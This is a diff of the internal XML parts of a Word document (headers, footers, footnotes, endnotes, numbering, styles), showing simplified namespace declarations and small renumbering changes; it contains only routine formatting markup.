+<w:endnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:endnote w:type="separator" w:id="0">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -727,7 +482,7 @@
       </w:r>
     </w:p>
   </w:endnote>
-  <w:endnote w:type="continuationSeparator" w:id="0">
+  <w:endnote w:type="continuationSeparator" w:id="1">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -741,7 +496,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -751,7 +506,7 @@
 </file>
 
 <file path=word/footer2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -761,7 +516,7 @@
 </file>
 
 <file path=word/footer3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:ftr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Footer"/>
@@ -771,8 +526,8 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
-  <w:footnote w:type="separator" w:id="-1">
+<w:footnotes xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:footnote w:type="separator" w:id="0">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -782,7 +537,7 @@
       </w:r>
     </w:p>
   </w:footnote>
-  <w:footnote w:type="continuationSeparator" w:id="0">
+  <w:footnote w:type="continuationSeparator" w:id="1">
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
@@ -796,7 +551,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Header"/>
@@ -806,7 +561,7 @@
 </file>
 
 <file path=word/header2.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Header"/>
@@ -816,7 +571,7 @@
 </file>
 
 <file path=word/header3.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:hdr xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:p>
     <w:pPr>
       <w:pStyle w:val="Header"/>
@@ -826,8 +581,8 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
-  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+<w:numbering xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:abstractNum w:abstractNumId="0">
     <w:nsid w:val="07690303"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="51A47C40"/>
@@ -913,7 +668,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="2F4F30AA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="53542892"/>
@@ -999,7 +754,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="40EC6424"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="51A47C40"/>
@@ -1085,7 +840,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="4F6E7D30"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DDB049E0"/>
@@ -1171,7 +926,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="57661FEF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AD2868AE"/>
@@ -1257,7 +1012,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="620223EC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F7D8BB7E"/>
@@ -1346,7 +1101,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="74286B50"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="1CC8AACA"/>
@@ -1460,14 +1215,14 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
         <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
         <w:sz w:val="22"/>
         <w:szCs w:val="22"/>
-        <w:lang w:val="en-IL" w:eastAsia="en-US" w:bidi="he-IL"/>
+        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="he-IL"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault>
@@ -1477,383 +1232,144 @@
       </w:pPr>
     </w:pPrDefault>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
